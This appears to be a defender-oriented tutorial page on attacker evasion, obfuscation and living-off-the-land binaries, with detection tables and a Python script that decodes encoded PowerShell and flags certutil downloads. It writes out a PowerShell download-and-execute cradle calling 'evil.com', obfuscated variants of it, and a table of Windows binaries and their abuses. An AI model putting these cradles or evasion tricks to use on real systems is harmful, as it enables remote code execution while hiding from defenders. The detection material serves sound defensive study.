Evasion & Obfuscation

How attackers hide from security controls and detection

Why Attackers Evade

Modern security defenses are layered: firewalls, IDS/IPS, EDR, SIEM. Attackers must bypass multiple detection mechanisms to succeed. Understanding evasion helps defenders:

  • Recognize signs of evasion attempts
  • Tune detection rules for encoded/obfuscated content
  • Hunt for techniques that bypass automated detection
  • Understand attacker tradecraft for better defense

Common Evasion Categories


  • Encrypted Channels (T1573): Using TLS/SSL to hide C2 communication from inspection
  • Protocol Tunneling (T1572): Hiding malicious traffic inside legitimate protocols (DNS, HTTPS, ICMP)
  • Data Encoding (T1132): Base64, XOR, custom encoding to bypass pattern matching
  • Fragmentation (T1027): Splitting payloads across packets or time to evade inspection
  • Steganography (T1001.002): Hiding data in images, audio, or other innocent-looking files
  • Polymorphism (T1027.001): Changing malware code each execution to evade signatures

Obfuscation Techniques

Making malicious code harder to analyze and detect


PowerShell Obfuscation Examples

Attackers use various techniques to hide malicious PowerShell:

# Original command:
Invoke-Expression (New-Object Net.WebClient).DownloadString('http://evil.com/payload')

# Obfuscated versions:
powershell -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0AC...
powershell -enc [base64 encoded command]
iex($env:comspec[4,15,25]-join'')
&((gv '*mdr*').Name[3,11,2]-join'')

Detection Indicators

Indicator                 What It Suggests
------------------------  ----------------------------------------
-e or -enc flag           Base64 encoded PowerShell command
FromBase64String          Runtime decoding of encoded content
Unusual variable names    Auto-generated obfuscated code
String concatenation      Hiding keywords from detection
Tick marks in commands    Breaking up detectable strings

Living Off the Land

Using legitimate system tools for malicious purposes

What is LOTL?

"Living Off the Land" (LOTL) refers to attackers using built-in operating system tools rather than custom malware. This makes detection difficult because:

  • Tools are signed by Microsoft/Apple — trusted by default
  • Already present on systems — no need to drop files
  • Legitimate admin use — hard to distinguish malicious use
  • No custom indicators — traditional AV cannot detect

Common LOLBins (Windows)

Binary            Typical abuse
----------------  ----------------------------------------
certutil.exe      Download files, decode Base64
mshta.exe         Execute HTA files/scripts
regsvr32.exe      Execute DLLs, bypass AppLocker
rundll32.exe      Execute arbitrary DLLs
wmic.exe          Execute commands, process creation
powershell.exe    Script execution, download cradles
bitsadmin.exe     Download files in background
msiexec.exe       Execute malicious MSI packages

Detection Strategies

Strategy                 Implementation
-----------------------  -------------------------------------------------------
Command-line logging     Enable PowerShell ScriptBlock logging, Sysmon
Behavioral analytics     Monitor for unusual parent-child process relationships
Network correlation      Flag certutil/bitsadmin making external connections
Baseline comparison      Alert on first-time use of LOLBins by users
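The following is an added Python example, not code from the original page: it applies the indicators from the PowerShell table (an -e/-enc style flag whose value is base64-decoded from UTF-16LE, tick marks, string concatenation, keywords such as IEX and FromBase64String) and the network-correlation strategy for certutil/bitsadmin (a remote URL on the command line) to process-creation events. The two sample events, the example.invalid URLs and all function names are constructed for illustration.

```python
import base64
import re
# Constructed sample process-creation events (image path, command line), not real telemetry;
# the encoded one is built from its plaintext here so the base64 is known to be valid.
ENCODED_SAMPLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')".encode("utf-16-le")
).decode("ascii")
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -nop -w hidden -enc " + ENCODED_SAMPLE),
    (r"C:\Windows\System32\certutil.exe", "certutil.exe -f http://example.invalid/a.txt a.txt"),
]
# "-flag value" pairs; powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...).
FLAG_RE = re.compile(r"(?:^|\s)[-/]([A-Za-z]+)\s+([A-Za-z0-9+/=]{8,})")
KEYWORD_RE = re.compile(r"(?i)\b(iex|invoke-expression|frombase64string|downloadstring|downloadfile)\b")
TICK_RE = re.compile(r"[A-Za-z]`[A-Za-z]")      # tick marks splitting a keyword (I`E`X)
CONCAT_RE = re.compile(r"['\"]\s*\+\s*['\"]")    # string concatenation ('Down'+'loadString')
URL_RE = re.compile(r"(?i)\b(?:https?|ftp)://")
LOLBINS_NETWORK = {"certutil.exe", "bitsadmin.exe"}  # LOLBins that should rarely be handed a remote URL
def is_encoded_flag(flag: str) -> bool:
    return flag.lower() == "ec" or "encodedcommand".startswith(flag.lower())
def decode_encoded_command(blob: str):
    """-EncodedCommand carries base64 of the UTF-16LE script; returns None if it does not decode."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def scan_text(text: str, where: str) -> list:
    """Plaintext indicators from the table above, applied to a raw or a decoded command."""
    hits = [f"{where}: keyword {kw.lower()}" for kw in KEYWORD_RE.findall(text)]
    if TICK_RE.search(text):
        hits.append(f"{where}: tick marks inside a token")
    if CONCAT_RE.search(text):
        hits.append(f"{where}: string concatenation")
    return hits

def analyze_event(image: str, cmdline: str) -> list:
    """Indicator strings for one process-creation event; an empty list means nothing was flagged."""
    exe = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    findings = scan_text(cmdline, "command line")
    if exe in ("powershell.exe", "pwsh.exe"):
        for flag, blob in FLAG_RE.findall(cmdline):
            if is_encoded_flag(flag):
                decoded = decode_encoded_command(blob) or "<undecodable>"
                findings.append(f"-{flag}: encoded command decodes to: {decoded}")
                findings += scan_text(decoded, "decoded command")
    if exe in LOLBINS_NETWORK and URL_RE.search(cmdline):
        findings.append(f"{exe}: remote URL on command line")
    return findings
```

Run analyze_event over each tuple in SAMPLE_EVENTS: the PowerShell event yields the decoded cradle plus its keywords, the certutil event yields the remote-URL finding, and a plain "certutil.exe -verify cert.cer" yields nothing.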
